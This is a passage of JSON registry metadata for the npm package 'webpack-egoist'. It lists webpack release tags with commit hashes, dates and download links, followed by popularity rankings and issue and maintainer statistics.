/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:13:41.173Z","dependent_packages_count":1,"downloads":6,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":59.88173098450381,"dependent_repos_count":10.295976646711454,"dependent_packages_count":20.907756255897063,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":18.311246857819174},"purl":"pkg:npm/webpack-egoist","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-egoist","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-egoist","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-egoist/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issue